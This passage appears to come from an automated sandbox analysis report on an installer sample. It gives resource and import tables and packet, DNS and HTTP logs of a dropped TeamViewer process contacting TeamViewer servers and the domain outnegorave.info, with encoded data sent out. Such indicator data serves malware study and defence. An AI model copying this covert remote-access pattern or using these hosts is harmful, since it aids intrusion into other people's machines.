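    return shannon_entropy(raw)


if __name__ == "__main__":
    for name, reason in section_findings(REPORT_SECTIONS):
        print(f"{name}: {reason}")
```

Run against the table, the only findings are .ndata and .data, both size anomalies rather than entropy ones; for an installer stub that is the expected shape, and it tells the analyst that the interesting bytes are outside the sections rather than packed inside them.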

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x442e0 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 1056964862 | English | United States
RT_ICON | 0x48508 | 0x25a8 | data | English | United States
RT_ICON | 0x4aab0 | 0x2488 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
RT_ICON | 0x4cf38 | 0x1a68 | data | English | United States
RT_ICON | 0x4e9a0 | 0x10a8 | data | English | United States
RT_ICON | 0x4fa48 | 0x988 | data | English | United States
RT_ICON | 0x503d0 | 0x6b8 | data | English | United States
RT_ICON | 0x50a88 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
RT_DIALOG | 0x50ef0 | 0x202 | data | English | United States
RT_DIALOG | 0x510f8 | 0xf8 | data | English | United States
RT_DIALOG | 0x511f0 | 0xee | data | English | United States
RT_GROUP_ICON | 0x512e0 | 0x76 | data | English | United States
RT_MANIFEST | 0x51358 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Imports
KERNEL32.DLL | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Note: no networking library (WS2_32, WININET, WINHTTP, URLMON) appears in the import table, yet the sample produces the HTTP traffic listed under Network Behavior. The stub imports LoadLibraryA, LoadLibraryExA and GetProcAddress and can therefore resolve further APIs at runtime, so this list is a lower bound on the capabilities exercised, not a complete inventory.

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 15, 2021 14:08:00.896482944 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:00.917491913 CEST | 80 | 49752 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:00.917788029 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:00.918462038 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:00.940159082 CEST | 80 | 49752 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:00.940284014 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:00.958070040 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:00.980880976 CEST | 80 | 49752 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:00.981093884 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.008373976 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.029356003 CEST | 80 | 49752 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.029424906 CEST | 80 | 49752 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.029478073 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.029532909 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.030750990 CEST | 49752 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.035720110 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.051665068 CEST | 80 | 49752 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.056746006 CEST | 80 | 49753 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.058818102 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.058862925 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.080029964 CEST | 80 | 49753 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.082326889 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.084237099 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.105293989 CEST | 80 | 49753 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.105370045 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.106717110 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.128108978 CEST | 80 | 49753 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.130171061 CEST | 80 | 49753 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.130367994 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.131237030 CEST | 49753 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.133955002 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.152343035 CEST | 80 | 49753 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.155005932 CEST | 80 | 49754 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.155142069 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.155966043 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.179565907 CEST | 80 | 49754 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.181721926 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.183722973 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.204659939 CEST | 80 | 49754 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.207657099 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.209389925 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.230426073 CEST | 80 | 49754 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.230473042 CEST | 80 | 49754 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.230581045 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.230953932 CEST | 49754 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.237579107 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.251744032 CEST | 80 | 49754 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.258640051 CEST | 80 | 49755 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.258778095 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.259424925 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.282213926 CEST | 80 | 49755 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.285140991 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.287225962 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.309426069 CEST | 80 | 49755 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.314063072 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.314114094 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.335100889 CEST | 80 | 49755 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.336735964 CEST | 80 | 49755 | 185.188.32.1 | 192.168.2.6
Sep 15, 2021 14:08:01.342247963 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.342295885 CEST | 49755 | 80 | 192.168.2.6 | 185.188.32.1
Sep 15, 2021 14:08:01.350913048 CEST | 49756 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.394808054 CEST | 80 | 49756 | 37.252.232.109 | 192.168.2.6
Sep 15, 2021 14:08:01.395001888 CEST | 49756 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.395808935 CEST | 49756 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.435075998 CEST | 80 | 49756 | 37.252.232.109 | 192.168.2.6
Sep 15, 2021 14:08:01.435647964 CEST | 49756 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.439027071 CEST | 49757 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.478888988 CEST | 80 | 49757 | 37.252.232.109 | 192.168.2.6
Sep 15, 2021 14:08:01.489496946 CEST | 49757 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.495162010 CEST | 49757 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.495203018 CEST | 49757 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.542887926 CEST | 80 | 49756 | 37.252.232.109 | 192.168.2.6
Sep 15, 2021 14:08:01.542922020 CEST | 80 | 49757 | 37.252.232.109 | 192.168.2.6
Sep 15, 2021 14:08:01.544677973 CEST | 49756 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.544800043 CEST | 49757 | 80 | 192.168.2.6 | 37.252.232.109
Sep 15, 2021 14:08:01.584625006 CEST | 80 | 49756 | 37.252.232.109 | 192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.585436106 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.587244987 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.623857975 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627022028 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627052069 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:01.627109051 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.627151966 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808084965 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.808274031 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:01.847999096 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.235275030 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.278043985 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.278857946 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336889029 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336922884 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.336926937 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.376280069 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.376321077 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377862930 CEST804975737.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.377959967 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.378012896 CEST4975780192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.422226906 CEST804975637.252.232.109192.168.2.6
                                                                                                                      Sep 15, 2021 14:08:02.731400013 CEST4975680192.168.2.637.252.232.109
                                                                                                                      Sep 15, 2021 14:08:02.731461048 CEST4975680192.168.2.637.252.232.109

UDP Packets

Timestamp                              Src Port  Dst Port  Source IP      Dest IP
Sep 15, 2021 14:07:55.339137077 CEST   58384     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:07:55.366976023 CEST   53        58384     8.8.8.8        192.168.2.6
Sep 15, 2021 14:07:59.058855057 CEST   60261     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:07:59.094980001 CEST   53        60261     8.8.8.8        192.168.2.6
Sep 15, 2021 14:07:59.112746000 CEST   56061     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:07:59.150213003 CEST   53        56061     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:00.839952946 CEST   58336     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:00.878603935 CEST   53        58336     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:03.412535906 CEST   53781     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:03.445225954 CEST   53        53781     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:14.876324892 CEST   54064     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:14.906733036 CEST   53        54064     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:15.979767084 CEST   52811     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:16.009274006 CEST   53        52811     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:18.095195055 CEST   55299     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:18.122610092 CEST   53        55299     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:22.332706928 CEST   63745     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:22.384006977 CEST   53        63745     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:23.001681089 CEST   50055     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:23.072467089 CEST   53        50055     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:24.531429052 CEST   61374     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:24.561456919 CEST   53        61374     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:24.859649897 CEST   50339     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:24.902987003 CEST   53        50339     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:25.034883976 CEST   63307     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:25.096126080 CEST   53        63307     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:26.477113962 CEST   49694     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:26.555916071 CEST   53        49694     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:27.616777897 CEST   54982     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:27.647160053 CEST   53        54982     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:29.198575974 CEST   50010     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:29.230607986 CEST   53        50010     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:30.075391054 CEST   63718     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:30.105350018 CEST   53        63718     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:31.662997007 CEST   62116     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:31.703227997 CEST   53        62116     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:32.473421097 CEST   63816     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:32.503563881 CEST   53        63816     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:36.936897039 CEST   55014     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:36.968677998 CEST   53        55014     8.8.8.8        192.168.2.6
Sep 15, 2021 14:08:52.816452980 CEST   62208     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:08:52.857124090 CEST   53        62208     8.8.8.8        192.168.2.6
Sep 15, 2021 14:09:14.727735996 CEST   57574     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:09:14.763683081 CEST   53        57574     8.8.8.8        192.168.2.6
Sep 15, 2021 14:09:16.474416018 CEST   51818     53        192.168.2.6    8.8.8.8
Sep 15, 2021 14:09:16.509351969 CEST   53        51818     8.8.8.8        192.168.2.6

DNS Queries

Timestamp                              Source IP     Dest IP   Trans ID  OP Code             Name                     Type            Class
Sep 15, 2021 14:07:59.058855057 CEST   192.168.2.6   8.8.8.8   0x281     Standard query (0)  ping3.dyngate.com        A (IP address)  IN (0x0001)
Sep 15, 2021 14:07:59.112746000 CEST   192.168.2.6   8.8.8.8   0xa930    Standard query (0)  ping3.dyngate.com        A (IP address)  IN (0x0001)
Sep 15, 2021 14:08:00.839952946 CEST   192.168.2.6   8.8.8.8   0x6a24    Standard query (0)  master1.teamviewer.com   A (IP address)  IN (0x0001)
Sep 15, 2021 14:08:03.412535906 CEST   192.168.2.6   8.8.8.8   0x66a0    Standard query (0)  outnegorave.info         A (IP address)  IN (0x0001)

DNS Answers

Timestamp                              Source IP  Dest IP       Trans ID  Reply Code      Name                     CName  Address         Type            Class
Sep 15, 2021 14:07:59.094980001 CEST   8.8.8.8    192.168.2.6   0x281     Name error (3)  ping3.dyngate.com        none   none            A (IP address)  IN (0x0001)
Sep 15, 2021 14:07:59.150213003 CEST   8.8.8.8    192.168.2.6   0xa930    Name error (3)  ping3.dyngate.com        none   none            A (IP address)  IN (0x0001)
Sep 15, 2021 14:08:00.878603935 CEST   8.8.8.8    192.168.2.6   0x6a24    No error (0)    master1.teamviewer.com   none   185.188.32.1    A (IP address)  IN (0x0001)
Sep 15, 2021 14:08:03.445225954 CEST   8.8.8.8    192.168.2.6   0x66a0    No error (0)    outnegorave.info         none   172.67.205.33   A (IP address)  IN (0x0001)
Sep 15, 2021 14:08:03.445225954 CEST   8.8.8.8    192.168.2.6   0x66a0    No error (0)    outnegorave.info         none   104.21.77.64    A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• outnegorave.info
• master1.teamviewer.com
• 37.252.232.109

HTTP Packets

Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
0           192.168.2.6  49758        172.67.205.33   443               C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
1           192.168.2.6  49834        172.67.205.33   443               C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
2           192.168.2.6  49839        172.67.205.33   443               C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
3           192.168.2.6  49752        185.188.32.1    80                C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp  kBytes transferred  Direction  Data
Sep 15, 2021 14:08:00.918462038 CEST   925  OUT  GET /din.aspx?s=00000000&client=DynGate&rnd=21120765&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:08:00.940159082 CEST   925  IN   HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 33 32 31 37 32 39 36 35
    Data Ascii: $32172965
Sep 15, 2021 14:08:00.958070040 CEST   926  OUT  GET /dout.aspx?s=32172965&p=10000001&client=DynGate&data=FyQSiQCjHqkys5MkoZ6YmJubm5wbGZqTJKIemBMmoKGemDwysbMaMTEcsJyYmBovmLIZshiyspkxsjGYG7Mwr5kZmZyYGJwamBuTJqSiHpg8MrGzGjExHLCcmJgaL5iyGbIYsrKZMbIxmBuzMK+ZGZmcmBicGpgbkyepnqu0txuTKx6YmpcYFxscG5AoqQ== HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:08:00.980880976 CEST   926  IN   HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:08:01.008373976 CEST   926  OUT  GET /din.aspx?s=32172965&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:08:01.029356003 CEST   926  IN   HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 16
    Data Raw: 17 24 13 0b 00 98 20 19 9c 98 98 1b 99 19 1b 1b
    Data Ascii: $


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
4           192.168.2.6  49753        185.188.32.1    80                C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp  kBytes transferred  Direction  Data
Sep 15, 2021 14:08:01.058862925 CEST   927  OUT  GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:08:01.080029964 CEST   927  IN   HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 10
    Data Raw: 17 24 33 32 31 37 32 39 36 39
    Data Ascii: $32172969
Sep 15, 2021 14:08:01.084237099 CEST   928  OUT  GET /dout.aspx?s=32172969&p=10000001&client=DynGate&data=FyQSAAGjHqmyuig6sTY0saWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAADCARCWdP+8wfzgDovZDWc9KRaNBTKXeqgMryYWfWccXbGfDEfNT+U4KZFEiNZd0zuH/MQ/SRaQNNnjtv84KYe+U040c3/As43/r8ahQdfkk0H9Ix4o0kZbzU7V9NoH0DUbHQEDVFZHq15qjFwADH4MEpxjjsD/4at/ndBEZYFB HTTP/1.1
    Accept: */*
    Content-Type: application/octet-stream
    Content-Transfer-Encoding: binary
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:08:01.105293989 CEST   928  IN   HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-length: 0
Sep 15, 2021 14:08:01.106717110 CEST   928  OUT  GET /din.aspx?s=32172969&client=DynGate&p=10000002 HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
    Host: master1.teamviewer.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Sep 15, 2021 14:08:01.128108978 CEST   929  IN   HTTP/1.1 200 OK
    Pragma: no-cache
    Cache-control: no-cache, no-store
    Content-Type: application/octet-stream
    Content-length: 9
    Data Raw: 17 24 13 04 00 98 20 27 a5
    Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49754 | 185.188.32.1 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.155966043 CEST | 929 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master1.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.179565907 CEST | 929 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-Type: application/octet-stream
  Content-length: 10
  Data Raw: 17 24 33 32 31 37 32 39 37 33
  Data Ascii: $32172973
Sep 15, 2021 14:08:01.183722973 CEST | 930 | OUT | GET /dout.aspx?s=32172973&p=10000001&client=DynGate&data=FyQSAwGjHqmyuim0s7cwujq5MqWyvJMkoZ6YmJubm5wbGZqTJKIemZyYmBuZGRsbkyakoh6YPDKxsxoxMRywnJiYGi+YshmyGLKymTGyMZgbszCvmRmZnJgYnBqYG5MrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAAH7JHR8QgtaO7yBL7EyIXekv6NKfS/9saFdKCbGvK+cyECqaxlVV8H0eABNoQ2/lzw1z6YYl5neJbLrah282nr/4Hb+JS5aEuXRLIqpmcd0emf/P4vNdqWqM9q1bNbkmmV2Req6X7tG3LfTWPkLja/ZTELvLqPL88NLfU4qvNBdr HTTP/1.1
  Accept: */*
  Content-Type: application/octet-stream
  Content-Transfer-Encoding: binary
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master1.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.204659939 CEST | 930 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-length: 0
Sep 15, 2021 14:08:01.209389925 CEST | 931 | OUT | GET /din.aspx?s=32172973&client=DynGate&p=10000002 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master1.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.230426073 CEST | 931 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-Type: application/octet-stream
  Content-length: 9
  Data Raw: 17 24 13 04 00 98 20 27 a5
  Data Ascii: $ '


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.6 | 49755 | 185.188.32.1 | 80 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2021 14:08:01.259424925 CEST | 932 | OUT | GET /din.aspx?s=00000000&client=DynGate&rnd=197887096&p=10000001 HTTP/1.1
  Accept: */*
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
  Host: master1.teamviewer.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Sep 15, 2021 14:08:01.282213926 CEST | 932 | IN | HTTP/1.1 200 OK
  Pragma: no-cache
  Cache-control: no-cache, no-store
  Content-Type: application/octet-stream
  Content-length: 10
  Data Raw: 17 24 33 32 31 37 32 39 37 38
  Data Ascii: $32172978
